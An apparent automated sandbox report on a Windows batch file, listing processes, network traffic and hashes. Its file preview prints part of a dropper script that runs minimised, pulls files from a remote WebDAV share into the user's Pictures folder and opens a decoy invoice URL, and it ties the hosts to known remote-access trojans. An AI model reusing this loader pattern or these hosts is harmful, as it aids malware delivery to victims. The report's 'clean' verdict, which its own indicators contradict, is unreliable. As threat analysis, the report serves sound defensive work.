Windows
Analysis Report
file.cmd
Overview
General Information
Detection
Score: | 3 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 60% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 7276 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\file.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7348 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\file.cmd" MY_FLAG MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- chrome.exe (PID: 7500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- chrome.exe (PID: 7696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,14738724468335102062,7754338843543299743,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- cleanup
There are no malicious signatures.
Signature evidence types listed in the report (the per-row detail values did not survive extraction):
- HTTP Parser
- HTTPS traffic detected
- IP Address
- JA3 fingerprint
- TCP traffic detected without corresponding DNS query
- HTTP traffic detected
- DNS traffic detected
- String found in binary or memory
- Network traffic detected
- Classification label
- File created
- Mutant created
- Process created
- Section loaded
- LNK file
- Window detected
- Process information set
- Last function
- Queries volume information
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Information Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | ReversingLabs | | |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | Avira URL Cloud | safe | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
s2r.tn | 70.38.21.234 | true | false | unknown | |
www.google.com | 142.250.181.228 | true | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | unknown | |
| false | unknown | |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
70.38.21.234 | s2r.tn | Canada | 32613 | IWEB-ASCA | false |
239.255.255.250 | unknown | Reserved | unknown | unknown | false |
142.250.181.228 | www.google.com | United States | 15169 | GOOGLEUS | false |
IP |
---|
192.168.2.11 |
192.168.2.9 |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1446784 |
Start date and time: | 2024-05-23 21:06:31 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 19s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes: | 15 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | file.cmd |
Detection: | CLEAN |
Classification: | clean3.winCMD@20/10@6/5 |
EGA Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 142.250.186.67, 172.217.18.110, 64.233.166.84, 34.104.35.123, 192.229.221.95, 142.250.185.99, 216.58.212.174
- Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
- Not all processes were analyzed; the report is missing behavior information
- VT rate limit hit for: file.cmd
Input | Output |
---|---|
URL: https://s2r.tn/cgi/INVOICERVSHA.pdf Model: Perplexity: mixtral-8x7b-instruct | { "loginform": false, "reasons": [ "The text 'Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.' does not indicate the presence of a login form.", "The text suggests that the requested URL is not found, which is not related to a login form." ] } |
Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. |
Match | Associated Samples | Detection | Threat Names |
---|---|---|---|
70.38.21.234 | 10 | malicious | Unknown (7), VenomRAT (1), XWorm (2) |
239.255.255.250 | 10 | malicious | GuLoader (1), Unknown (9) |
Match | Associated Samples | Detection | Threat Names |
---|---|---|---|
s2r.tn | 10 | malicious | Unknown (7), VenomRAT (1), XWorm (2) |
Match | Associated Samples | Detection | Threat Names |
---|---|---|---|
IWEB-ASCA | 10 | malicious | Unknown (7), Mirai (1), AgentTesla, PureLog Stealer (2) |
Match | Associated Samples | Detection | Threat Names |
---|---|---|---|
1138de370e523e824bbca92d049a3777 | 10 | malicious | Unknown (8), HTMLPhisher (1), HtmlDropper, HTMLPhisher (1) |
28a2c9bd18a11de089ef85a160da29e4 | 10 | malicious | GuLoader (1), Unknown (7), HTMLPhisher (1), Phisher (1) |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2673 |
Entropy (8bit): | 3.9831154024425457 |
Encrypted: | false |
SSDEEP: | 48:8qLdFTEQHcidAKZdA1P4ehwiZUklqehTy+3:8UgvOoy |
MD5: | 3373BE2E65A5B67A6573BD5937B77B02 |
SHA1: | 10A6317F361C80BF6B800215FB3D8A004F9FF01B |
SHA-256: | 2ED6939A3DE110939FE808B497EB8CF8D63ABDD34D7D92144F934034896F3DFE |
SHA-512: | C6D04C838AB32735F8760A937EDA22989FD88F0A6D025035BDE40931BDE9217934F142CEC09FD87A3D76B54C19CBCFDEF75F4AD3925A49B7D733F132C4340CAB |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2675 |
Entropy (8bit): | 3.999383872021734 |
Encrypted: | false |
SSDEEP: | 48:8wdFTEQHcidAKZdA1+4eh/iZUkAQkqehYy+2:8qgeF9Q1y |
MD5: | 0966C44F27807C24CB5D7AD1ADBB9E92 |
SHA1: | E43F284C77E3F1DACAC7A19378164DD0D2D78888 |
SHA-256: | C9B3002A461B1D63F17F0F764CB1507E0CD44A7D6017AB0A398A28DC81AA6CC2 |
SHA-512: | B51028C4EEAA93A2B34F922523B47C576071005B91D130B8CF7ECCDB521ECD92BF7682D04EFFAAF7A3E5037F6E800A5C17CF419D8D15FF5BB5B594229FB88540 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2689 |
Entropy (8bit): | 4.00901776574024 |
Encrypted: | false |
SSDEEP: | 48:8DdFTEVHcidAKZdA1404eh7sFiZUkmgqeh7sSy+BX:83ggInsy |
MD5: | EB02143C37F7F70B20C448A007BB4A93 |
SHA1: | C75EF3213C916B9121B7F67215AFF4B2F1272C1D |
SHA-256: | 99423DBD82D50D6ED46E2A4FB55F1C92ED2648D756B4EC7B337E963215DC4E00 |
SHA-512: | 25AC955B4FA0B00BB14626A274E4B29E13A90702C4A31F8021A8D474356EB1F303F0EC5A907C09E52F37A3345E59394E2A03A93AE2EFB68E8AB2E59FACA4DA6B |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2677 |
Entropy (8bit): | 3.996620153697733 |
Encrypted: | false |
SSDEEP: | 48:8RdFTEQHcidAKZdA1p4ehDiZUkwqeh0y+R:8JgJ5ay |
MD5: | AA52651BE20AB2F63F0D26F05BE17E8F |
SHA1: | 1F299EA553C056C966F9454D5101C93C1574603A |
SHA-256: | 4DDA56F6B83EB7F4A08800EB43DD3FDE6E5B1C1A43A4EB36F763A7481A6B1E08 |
SHA-512: | 83EC06193B844C0B104BDFA78AD4CDF9DE510B9B86BE1C20CC52B4D4C64657EA6BAB812BD56C279ADAC7846812AC6627AFAC91E988C3C6D6C87D26B2618FF89B |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2677 |
Entropy (8bit): | 3.9867109874874265 |
Encrypted: | false |
SSDEEP: | 48:8MdFTEQHcidAKZdA1X4ehBiZUk1W1qehGy+C:82g3b9my |
MD5: | 831B133CD55443BC9A7053050E34FCE6 |
SHA1: | E586FA379A544890F711ADF5512FBD4AA8C19CF2 |
SHA-256: | 268EFE879B0E423DB7A34196C2C9C7237B729D249CF27683A26AB7631CDED24C |
SHA-512: | 6CE3E119D68895D55311A8E615DCBF9187129A5F7F8E5C08CC8B40DE698440616F77CE0084DE26FE2B0C605223FAD96A94E75823DEF09B2998B944ED95ECB02A |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2679 |
Entropy (8bit): | 3.9951662133706987 |
Encrypted: | false |
SSDEEP: | 48:8YdFTEQHcidAKZdA1duTc4ehOuTbbiZUk5OjqehOuTbsy+yT+:8ygwTcJTbxWOvTbsy7T |
MD5: | DD2AEA631D7515AFAE23F749A9F762E4 |
SHA1: | D20A29D3F13C72585B983CA9BB6DB3CDCE13ED85 |
SHA-256: | 6712B1A45E3D1AA680D63A9C7C2A7D3B6F778E7DB897BD9196098CBF41C0DA04 |
SHA-512: | 5B6483ECE31AEC130DC1CDB41BA31FC4B695AF7E66D51ABAB69C4BF3A461ECE2629173FC0F374163481D9266B837B8364B967B7A60AC569F8CF73CE93CE0AA44 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 315 |
Entropy (8bit): | 5.0572271090563765 |
Encrypted: | false |
SSDEEP: | 6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR |
MD5: | A34AC19F4AFAE63ADC5D2F7BC970C07F |
SHA1: | A82190FC530C265AA40A045C21770D967F4767B8 |
SHA-256: | D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3 |
SHA-512: | 42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765 |
Malicious: | false |
Reputation: | high, very likely benign file |
URL: | https://s2r.tn/favicon.ico |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 315 |
Entropy (8bit): | 5.0572271090563765 |
Encrypted: | false |
SSDEEP: | 6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR |
MD5: | A34AC19F4AFAE63ADC5D2F7BC970C07F |
SHA1: | A82190FC530C265AA40A045C21770D967F4767B8 |
SHA-256: | D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3 |
SHA-512: | 42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765 |
Malicious: | false |
URL: | https://s2r.tn/cgi/INVOICERVSHA.pdf |
Preview: |
File type: | |
Entropy (8bit): | 5.041379261744134 |
TrID: | |
File name: | file.cmd |
File size: | 1'473 bytes |
MD5: | 21737449c6f74e5e1189d703b6591d0f |
SHA1: | b09e319ed020ba959a1eee66897dfdd17d66b2d0 |
SHA256: | 8604af0ca2b410192af9b078386dceede67ffddc7a467fb4bec39173e69f94bd |
SHA512: | 3cc90489382f076894c911988ce49e20f0f5b3953bc8768cdf4565fa6f26bed905b22950b12ac483ca09ab1ea7d12c13503c6033d247a0702540f7da8886c794 |
SSDEEP: | 24:lHtNBd0zOTSMVgAqKwoxwbXn6omx4nXX6kkx4XHG4x7XmdrRbXpQjQZhQelQHnu/:FBdqXrPox2XZmx4nn3kx43Px72drXQjC |
TLSH: | 4A310C93511D8160A2A67AF6D73C16BFAD1810C5D201390860E6D5FF1637D45A3BBAF8 |
File Content Preview: | @echo off..if "%1" == "" start "" /min "%~f0" MY_FLAG && exit....set source=\\185.29.11.28@9999\DavWWWRoot\google\file..set desusertion=%USERPROFILE%\Pictures....echo Opening PDF file.....start "" "https://s2r.tn/cgi/INVOICERVSHA.pdf"....echo Copying upda |
Icon Hash: | 9686878b929a9886 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 23, 2024 21:07:16.605169058 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
May 23, 2024 21:07:16.620831013 CEST | 49673 | 443 | 192.168.2.9 | 204.79.197.203 |
May 23, 2024 21:07:17.808320045 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
May 23, 2024 21:07:19.855237961 CEST | 49676 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:19.855345011 CEST | 49675 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:20.136506081 CEST | 49674 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:20.214689970 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
May 23, 2024 21:07:25.027138948 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
May 23, 2024 21:07:26.230313063 CEST | 49673 | 443 | 192.168.2.9 | 204.79.197.203 |
May 23, 2024 21:07:29.099370003 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.099410057 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.099611998 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.099972010 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.100012064 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.100070000 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.100425005 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.100435972 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.100568056 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.100579977 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.469408989 CEST | 49676 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:29.469420910 CEST | 49675 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:29.628926039 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.629385948 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.629410982 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.630644083 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.630705118 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.631237030 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.653450012 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.653497934 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.654457092 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.654536963 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.654836893 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.655065060 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.655621052 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.655631065 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.656110048 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.656310081 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.705027103 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.705028057 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.705044031 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.749233007 CEST | 49674 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:29.749248981 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.815066099 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.815156937 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.815238953 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.817861080 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.817877054 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.960221052 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.006496906 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.081866026 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.081938028 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
May 23, 2024 21:07:30.017267942 CEST | 192.168.2.9 | 1.1.1.1 | c1f1 | (Port unreachable) | Destination Unreachable |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
May 23, 2024 21:07:27.792256117 CEST | 192.168.2.9 | 1.1.1.1 | 0xd522 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
May 23, 2024 21:07:27.792373896 CEST | 192.168.2.9 | 1.1.1.1 | 0xa2f3 | Standard query (0) | | 65 | IN (0x0001) | false |
May 23, 2024 21:07:28.814388990 CEST | 192.168.2.9 | 1.1.1.1 | 0x451b | Standard query (0) | | A (IP address) | IN (0x0001) | false |
May 23, 2024 21:07:28.814654112 CEST | 192.168.2.9 | 1.1.1.1 | 0xb06f | Standard query (0) | | 65 | IN (0x0001) | false |
May 23, 2024 21:07:31.375922918 CEST | 192.168.2.9 | 1.1.1.1 | 0x8a9d | Standard query (0) | | A (IP address) | IN (0x0001) | false |
May 23, 2024 21:07:31.376275063 CEST | 192.168.2.9 | 1.1.1.1 | 0x21c8 | Standard query (0) | | 65 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
May 23, 2024 21:07:29.092950106 CEST | 1.1.1.1 | 192.168.2.9 | 0x451b | No error (0) | | | 70.38.21.234 | A (IP address) | IN (0x0001) | false |
May 23, 2024 21:07:30.017195940 CEST | 1.1.1.1 | 192.168.2.9 | 0xd522 | No error (0) | | | 70.38.21.234 | A (IP address) | IN (0x0001) | false |
May 23, 2024 21:07:31.386106968 CEST | 1.1.1.1 | 192.168.2.9 | 0x8a9d | No error (0) | | | 142.250.181.228 | A (IP address) | IN (0x0001) | false |
May 23, 2024 21:07:31.393225908 CEST | 1.1.1.1 | 192.168.2.9 | 0x21c8 | No error (0) | | | | 65 | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.9 | 49711 | 70.38.21.234 | 443 | 7696 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:29 UTC | 669 | OUT | |
2024-05-23 19:07:29 UTC | 164 | IN | |
2024-05-23 19:07:29 UTC | 315 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.9 | 49712 | 70.38.21.234 | 443 | 7696 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:29 UTC | 588 | OUT | |
2024-05-23 19:07:30 UTC | 164 | IN | |
2024-05-23 19:07:30 UTC | 315 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.9 | 49714 | 70.38.21.234 | 443 | 7696 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:30 UTC | 341 | OUT | |
2024-05-23 19:07:30 UTC | 164 | IN | |
2024-05-23 19:07:30 UTC | 315 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.9 | 49717 | 2.19.85.159 | 443 | | |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:33 UTC | 161 | OUT | |
2024-05-23 19:07:33 UTC | 467 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.9 | 49718 | 2.19.85.159 | 443 | | |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:34 UTC | 239 | OUT | |
2024-05-23 19:07:34 UTC | 535 | IN | |
2024-05-23 19:07:34 UTC | 55 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.9 | 49719 | 20.114.59.183 | 443 | | |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:40 UTC | 306 | OUT | |
2024-05-23 19:07:41 UTC | 560 | IN | |
2024-05-23 19:07:41 UTC | 15824 | IN | |
2024-05-23 19:07:41 UTC | 8666 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.9 | 49722 | 20.114.59.183 | 443 | | |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:08:18 UTC | 306 | OUT | |
2024-05-23 19:08:18 UTC | 560 | IN | |
2024-05-23 19:08:18 UTC | 15824 | IN | |
2024-05-23 19:08:18 UTC | 9633 | IN | |
Target ID: | 1 |
Start time: | 15:07:22 |
Start date: | 23/05/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7d0650000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 15:07:22 |
Start date: | 23/05/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 15:07:22 |
Start date: | 23/05/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7d0650000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 15:07:22 |
Start date: | 23/05/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 15:07:25 |
Start date: | 23/05/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b2cb0000 |
File size: | 3'242'272 bytes |
MD5 hash: | 5BBFA6CBDF4C254EB368D534F9E23C92 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 15:07:25 |
Start date: | 23/05/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b2cb0000 |
File size: | 3'242'272 bytes |
MD5 hash: | 5BBFA6CBDF4C254EB368D534F9E23C92 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |